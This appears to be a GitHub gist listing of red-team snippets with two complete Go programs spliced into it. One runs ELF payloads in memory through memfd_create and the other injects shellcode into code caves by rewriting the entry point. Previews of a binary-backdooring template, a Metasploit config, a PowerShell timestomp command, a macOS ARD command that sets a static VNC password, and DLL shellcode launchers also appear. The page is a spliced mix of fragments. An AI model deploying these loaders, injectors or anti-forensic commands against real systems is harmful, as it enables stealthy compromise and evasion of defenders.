Dan Borges ahhh
danger code
ahhh / invokeInMemLinux.go
Created July 19, 2020 21:22 — forked from capnspacehook/invokeInMemLinux.go
Executes a binary or file in memory on a Linux system. Uses the memfd_create(2) syscall. Credits and idea from: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
package main
import (
"io/ioutil"
"os"
"os/exec"
"strconv"
"syscall"
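The invokeInMemLinux.go preview above stops at its imports. As an added example (not the gist's code and not capnspacehook's original), here is a complete Go loader built on the same memfd_create(2) technique: the ELF image is written into an anonymous memory-backed file and executed through /proc/self/fd/N, so nothing is written to disk. The per-architecture syscall numbers, the memfd name kernel_worker, the function names and the read-from-disk demo in main are assumptions of this example.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"os/exec"
	"runtime"
	"strconv"
	"syscall"
	"unsafe"
)

// mfdCloexec is MFD_CLOEXEC from <sys/memfd.h>: close the memfd on execve so
// the launched program does not inherit a descriptor to its own image.
const mfdCloexec = 0x0001

// memfdCreateNr returns the memfd_create(2) syscall number for the running
// architecture; the kernel numbers differ per ABI (assumed table, checked
// against the kernel's syscall tables for these four arches).
func memfdCreateNr() (uintptr, error) {
	switch runtime.GOARCH {
	case "amd64":
		return 319, nil
	case "386":
		return 356, nil
	case "arm64":
		return 279, nil
	case "arm":
		return 385, nil
	}
	return 0, fmt.Errorf("memfd_create number unknown for %s", runtime.GOARCH)
}

// MemfdCreate wraps the raw syscall and returns an anonymous, memory-backed
// file descriptor. The name shows up in /proc/<pid>/exe and /proc/<pid>/maps
// as "/memfd:<name> (deleted)", which is exactly what a defender looks for.
func MemfdCreate(name string) (int, error) {
	if runtime.GOOS != "linux" {
		return -1, errors.New("memfd_create is Linux-only")
	}
	nr, err := memfdCreateNr()
	if err != nil {
		return -1, err
	}
	cname, err := syscall.BytePtrFromString(name)
	if err != nil {
		return -1, err
	}
	fd, _, errno := syscall.Syscall(nr, uintptr(unsafe.Pointer(cname)), mfdCloexec, 0)
	if errno != 0 {
		return -1, errno
	}
	return int(fd), nil
}

// LoadIntoMemfd writes image into a fresh memfd and returns the open file plus
// the /proc/self/fd path that exec can use; the filesystem is never touched.
func LoadIntoMemfd(name string, image []byte) (*os.File, string, error) {
	fd, err := MemfdCreate(name)
	if err != nil {
		return nil, "", err
	}
	f := os.NewFile(uintptr(fd), name)
	if _, err := f.Write(image); err != nil {
		f.Close()
		return nil, "", err
	}
	return f, "/proc/self/fd/" + strconv.Itoa(fd), nil
}

// RunFromMemory loads an ELF image into a memfd and executes it with args,
// wiring the child's stdio to ours. The child resolves /proc/self/fd/N itself;
// that works because fork() copies the descriptor and execve only closes
// CLOEXEC descriptors after it has opened the program image.
func RunFromMemory(name string, image []byte, args ...string) error {
	f, path, err := LoadIntoMemfd(name, image)
	if err != nil {
		return err
	}
	defer f.Close()
	cmd := exec.Command(path, args...)
	cmd.Stdin, cmd.Stdout, cmd.Stderr = os.Stdin, os.Stdout, os.Stderr
	return cmd.Run()
}

func main() {
	if len(os.Args) < 2 {
		fmt.Fprintln(os.Stderr, "usage: invokeInMem <elf-on-disk> [args...]")
		os.Exit(2)
	}
	// For the demo the image is read from disk; a real loader would receive
	// it over the network so that the payload never exists as a file.
	image, err := os.ReadFile(os.Args[1])
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	// "kernel_worker" is an assumed, deliberately bland memfd name.
	if err := RunFromMemory("kernel_worker", image, os.Args[2:]...); err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
}
```

Build it and run it as ./invokeInMem /bin/true (or any ELF the host can execute). The caveat a practitioner wants: the child's /proc/<pid>/exe link resolves to /memfd:kernel_worker (deleted) and its maps show the same path, so a sweep of /proc/*/exe for "memfd:" or "(deleted)" finds it immediately; the name argument is therefore part of the tradecraft, and auditd or an eBPF probe on memfd_create and execve of a /proc/*/fd/* path catches the technique regardless of the name.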
ahhh / binjection_example.gs
Created July 2, 2020 23:32
Binjection example in gscript
// Example gscript template
// Title: Binjection Example
// Author: ahhh
// Purpose: Replaces an existing binary with a copy that has been backdoored with shellcode
// Gscript version: 1.0.0
// ATT&CK:
//priority:150
//timeout:150
//import:/tmp/loader.bin
ahhh / gbj.go
Created July 2, 2020 23:05
GBJ is a thin shim that exposes binjection to gscript
package gbj
import (
"github.com/Binject/binjection/bj"
)
func PeBinject(sourceBytes []byte, shellcodeBytes []byte) ([]byte, error) {
ahhh / binjection_example.go
Created July 2, 2020 00:04
Using the binject/binjection library programmatically
package main
import (
"io/ioutil"
"fmt"
"github.com/Binject/binjection/bj"
)
var (
example_path = "example.exe"
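The gbj.go and binjection_example.go previews above only show the library being wired up. As an added example that is not code from Binject/binjection and does not use its API, this is a self-contained Go implementation of the simplest form of what the library automates: locate a code cave (a run of zero bytes inside an executable PT_LOAD segment), copy shellcode into it, and redirect e_entry to the cave. The constructed sample ELF in BuildSampleELF, the function names, the 32-byte minimum cave size and the four-byte INT3 placeholder shellcode are all assumptions of this example.

```go
package main

import (
	"bytes"
	"debug/elf"
	"encoding/binary"
	"fmt"
	"log"
)

// Cave is a run of zero bytes inside an executable PT_LOAD segment: the bytes
// already map R+X, so shellcode copied there runs without a permission change.
type Cave struct {
	FileOffset uint64 // where the cave starts in the file
	VirtAddr   uint64 // where those bytes are mapped at runtime
	Size       uint64
}

// FindCaves returns every run of at least minLen zero bytes that lies inside
// the file image of an executable PT_LOAD segment of the ELF image.
func FindCaves(image []byte, minLen uint64) ([]Cave, error) {
	f, err := elf.NewFile(bytes.NewReader(image))
	if err != nil {
		return nil, err
	}
	var caves []Cave
	for _, p := range f.Progs {
		if p.Type != elf.PT_LOAD || p.Flags&elf.PF_X == 0 {
			continue
		}
		end := p.Off + p.Filesz
		if end < p.Off || end > uint64(len(image)) {
			return nil, fmt.Errorf("segment at 0x%x extends past end of file", p.Off)
		}
		seg := image[p.Off:end]
		for i := 0; i < len(seg); {
			if seg[i] != 0 {
				i++
				continue
			}
			j := i
			for j < len(seg) && seg[j] == 0 {
				j++
			}
			if uint64(j-i) >= minLen {
				caves = append(caves, Cave{p.Off + uint64(i), p.Vaddr + uint64(i), uint64(j - i)})
			}
			i = j
		}
	}
	return caves, nil
}

// InjectIntoCave copies shellcode into the cave and points e_entry (offset 24 of
// the ELF64 header) at it. It returns the patched image and the original entry,
// which the shellcode must jump back to so the host program still works.
func InjectIntoCave(image []byte, cave Cave, shellcode []byte) ([]byte, uint64, error) {
	if len(image) < 64 || image[elf.EI_CLASS] != byte(elf.ELFCLASS64) || image[elf.EI_DATA] != byte(elf.ELFDATA2LSB) {
		return nil, 0, fmt.Errorf("only little-endian ELF64 images are supported")
	}
	if uint64(len(shellcode)) > cave.Size || cave.FileOffset+cave.Size > uint64(len(image)) {
		return nil, 0, fmt.Errorf("%d bytes of shellcode do not fit a %d-byte cave", len(shellcode), cave.Size)
	}
	out := append([]byte(nil), image...)
	copy(out[cave.FileOffset:], shellcode)
	origEntry := binary.LittleEndian.Uint64(out[24:32])
	binary.LittleEndian.PutUint64(out[24:32], cave.VirtAddr)
	return out, origEntry, nil
}

const sampleBase uint64 = 0x400000 // load address of the constructed fixture

// BuildSampleELF returns a constructed minimal ELF64 (header, one R+X PT_LOAD,
// 16 NOPs, a 64-byte zero cave, 8 NOPs). It is a fixture and is never executed.
func BuildSampleELF() []byte {
	body := append(bytes.Repeat([]byte{0x90}, 16), make([]byte, 64)...)
	body = append(body, bytes.Repeat([]byte{0x90}, 8)...)
	const hdrLen = 64 + 56 // ELF header plus one program header
	total := uint64(hdrLen + len(body))
	hdr := elf.Header64{Type: uint16(elf.ET_EXEC), Machine: uint16(elf.EM_X86_64), Version: 1,
		Entry: sampleBase + hdrLen, Phoff: 64, Ehsize: 64, Phentsize: 56, Phnum: 1, Shentsize: 64}
	copy(hdr.Ident[:], elf.ELFMAG)
	hdr.Ident[elf.EI_CLASS], hdr.Ident[elf.EI_DATA], hdr.Ident[elf.EI_VERSION] = byte(elf.ELFCLASS64), byte(elf.ELFDATA2LSB), byte(elf.EV_CURRENT)
	ph := elf.Prog64{Type: uint32(elf.PT_LOAD), Flags: uint32(elf.PF_R | elf.PF_X),
		Vaddr: sampleBase, Paddr: sampleBase, Filesz: total, Memsz: total, Align: 0x1000}
	var buf bytes.Buffer
	binary.Write(&buf, binary.LittleEndian, hdr)
	binary.Write(&buf, binary.LittleEndian, ph)
	buf.Write(body)
	return buf.Bytes()
}

func main() {
	image := BuildSampleELF()
	caves, err := FindCaves(image, 32)
	if err != nil || len(caves) == 0 {
		log.Fatal("no usable cave: ", err)
	}
	// Four INT3s stand in for shellcode; real shellcode ends with a jump to origEntry.
	out, origEntry, err := InjectIntoCave(image, caves[0], []byte{0xcc, 0xcc, 0xcc, 0xcc})
	if err != nil {
		log.Fatal(err)
	}
	fmt.Printf("cave file 0x%x vaddr 0x%x size %d; entry 0x%x -> 0x%x; %d bytes\n", caves[0].FileOffset, caves[0].VirtAddr, caves[0].Size, origEntry, caves[0].VirtAddr, len(out))
}
```

Two things the cave approach forces on the operator: the shellcode has to preserve registers and finish with a jump to the original entry point, or the host binary stops working and the implant is noticed at the next launch; and because the header and a code range change, the file's hash and any signature no longer verify, which is what file-integrity monitoring and package verification (rpm -V, debsums) catch. Only little-endian ELF64 is handled here; the page's gbj shim is for PE targets, where the same idea applies to the PE optional header's AddressOfEntryPoint.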
ahhh / msfconsole.rc
Created February 25, 2020 09:02
example msfconsole.rc from red team planning book
spool /root/.msf4/spool.log
setg ConsoleLogging true
setg verbose true
setg LogLevel 5
setg SessionLogging true
setg TimestampOutput true
setg PromptTimeFormat %Y%m%d.%H%M%S%z
setg PROMPT %T S:%S J:%J
setg ExitOnSession false
setg DisableCourtesyShell true
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager

PowerShell.exe -com {$file=(gi c:\demo\test.txt);$date='01/03/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
ahhh / ARD Kickstarter (vuln)
Last active August 20, 2019 19:40
Enables ARD with legacy VNC authentication and a static VNC password, which lets any VNC client that knows the password control the host; this is the vulnerable configuration the title refers to.
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -clientopts -setvnclegacy -vnclegacy yes -clientopts -setvncpw -vncpw mypasswd -restart -agent -privs -all
ahhh / DllMainThread.c
Created June 20, 2019 18:59 — forked from securitytube/DllMainThread.c
Launch Shellcode as a Thread via DllMain rather than a new process
// Dll Hijacking via Thread Creation
// Author - Vivek Ramachandran
// Learn Pentesting Online -- http://PentesterAcademy.com/topics and http://SecurityTube-Training.com
// Free Infosec Videos -- http://SecurityTube.net
#include <windows.h>
#define SHELLCODELEN 2048

using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause